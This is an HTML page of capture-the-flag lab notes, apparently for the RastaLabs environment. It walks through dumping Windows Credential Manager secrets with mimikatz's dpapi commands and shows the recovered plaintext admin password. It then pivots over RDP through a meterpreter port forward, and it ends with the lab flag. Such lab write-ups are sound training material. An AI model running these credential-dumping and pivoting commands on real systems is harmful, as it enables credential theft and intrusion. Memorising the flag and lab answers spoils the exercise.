<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>7 flag</title>
</head><body>On enumeration on WS02, found vault is installed,<br/>
so we can dump creds from it<br/>
<br/>
reference ----&gt; https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/<br/>
<br/>
Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
uploaded mimikatz.exe and execute cmds,<br/>
<br/>
sekurlsa::dpapi &nbsp; -----&gt; get the master key from here<br/>
<br/>
dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9<br/>
<br/>
dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84e4d4f44f01c8d4fb8dccc8da37bbada94ecb374e813c46b03e0cd35fd4d285b5826a411fc6d3cf382d4f3aa6010ea3cae8a8a11fd4b375908e6ca17067<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
<br/>
<img src="screenshot 3.png" /><br/>
<br/>
UserName &nbsp; &nbsp; &nbsp; : &nbsp; &nbsp;RLAB\epugh_adm<br/>
CredentialBlob : &nbsp; IReallyH8LongPasswords!<br/>
<br/>
portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389<br/>
<br/>
install remmina and import the sql01.rdp and change the host from sql01.rastalabs.local to 10.10.14.83 then export to .rdp file<br/>
<br/>
xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local<br/>
<br/>
<br/>
RASTA{c00k1n6_w17h_645_n0w}<br/>
<br/>
<br/>
</body></html>